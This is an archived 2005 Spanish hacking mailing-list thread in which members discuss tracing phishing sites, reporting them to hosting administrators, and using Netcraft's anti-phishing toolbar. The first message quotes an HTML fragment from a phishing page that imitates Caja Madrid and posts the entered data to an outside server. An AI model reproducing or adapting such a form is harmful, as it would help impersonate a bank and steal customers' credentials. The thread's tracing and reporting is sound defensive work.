[HACK] Luchar contra el phising - ¿ Cómo ?

Javier Turégano javi at ideando.net
Tue Jun 14 13:02:09 CEST 2005 

	El otro día navegando por la web de Netcraft encontré que han
desarrollado una barra de herramientas anti-phising. Me decidí a
probarla y me pareció bastante interesante. Incluso detectó y bloqueó un
correo de phising del BBVA que llegó a mi buzón. Además creo que permite
notificar de páginas que realizan estos ataques. Por otro lado da
información muy util (procedente del whois del sitio) como la red y pais
en la que está alojado el servidor, etc.

	Para los que os animeis a probarla:

	http://toolbar.netcraft.com/
	http://toolbar.netcraft.com/
	http://toolbar.netcraft.com/

	Un saludo.

Javier Turégano.


El lun, 13-06-2005 a las 19:27 +0200, zumbi escribió:
> Hola listeros,
> 
>  * Problema:
>  
>   Lucha contra el phising.
>   
>  * Posible solución:
>   
>   Hasta ahora he localizado dónde se encontraba el servidor fraudulento
> y he ido notificando a los administradores de los sistemas que tenían
> hospedada una página que se dedicaba al fraude. Por ejemplo,
>  
>     1. Me llega un correo que me pide claves de usuario, le doy a Enviar
> y me lleva a la web del banco.
>         Si se lee en html del fichero nos encontramos con la siguiente
> línea:
> 
> <--! snipet -->
> 
> <form name="f1" method="post" action="http://www.testsway.com/script.php">
> <table align="center" border="0" width="590"><tbody><tr><td
> align="center" valig
> n="top" width="275">
> <table border="0" cellpadding="0" cellspacing="0"
> width="239"><tbody><tr><td><im
> g alt="Caja Madrid"
> src="https://oi.cajamadrid.es/CajaMadrid/oi/imagenes/logocm.
> gif" border="0" height="43" vspace="13"
> width="115"></td></tr><tr><td><img alt="
> " src="https://oi.cajamadrid.es/CajaMadrid/oi/imagenes/imagengr.jpg"
> border="0"
> height="106" width="239"></td></tr><tr><td height="55"
> valign="bottom"><img alt=
> "Oficina Internet | Caja Madrid"
> src="https://oi.cajamadrid.es/CajaMadrid/oi/ima
> genes/logooi_08.gif" border="0" height="42"
> width="239"></td></tr></tbody></tabl
> e>
> 
> <--! end snipet -->
> 
>     Buscando la cadena form nos indica donde se enviará el formulario:
> http://www.testsway.com/script.php
>  
>     $ host www.testsway.com
>     www.testsway.com       A       xx.235.220.67
> 
>     $ whois xx.235.220.67
>     --> Obtendremos el correo electrónico donde podemos denunciar este
> hecho al administrador para que obrando de buena voluntad, retire la
> página web de su dominio.
> 
>   2. En otras ocasiones no hará ni falta mirar el html, pues
> directamente, el correo te dirigirá al site malintencionado. Se procede
> con el host y el whois y podemos denunciar estos hechos al administrador
> del sistema.
> 
> 
>   * Pegas:
> 
>     Resulta que he estado denunciando estos hechos, pero después de unas
> cuantas páginas retiradas me empiezo a cansar de hacerlo. Entonces me
> gustaría preguntarles si alguno conoce alguna herramienta libre que
> realize este proceso o si no existiera a alguno se le ocurre que se
> podría hacer para luchar contra esto.
> 
>     ¿ Alguno de ustedes conoce alguna forma alternativa de obrar que
> merezca la pena, notificarlo al banco, a policia.es, ... ?
> 
> 
>   Gracias por su atención,
>     zumbi
> 
> 		
> ______________________________________________ 
> Renovamos el Correo Yahoo! 
> Nuevos servicios, más seguridad 
> http://correo.yahoo.es
> _______________________________________________
> Lista - http://mailman.argo.es/listinfo/hacking
> FAQ - http://www.argo.es/~jcea/artic/hack-faq.htm
> "una-al-dia" para estar siempre informado - http://www.hispasec.com/
>

More information about the hacking mailing list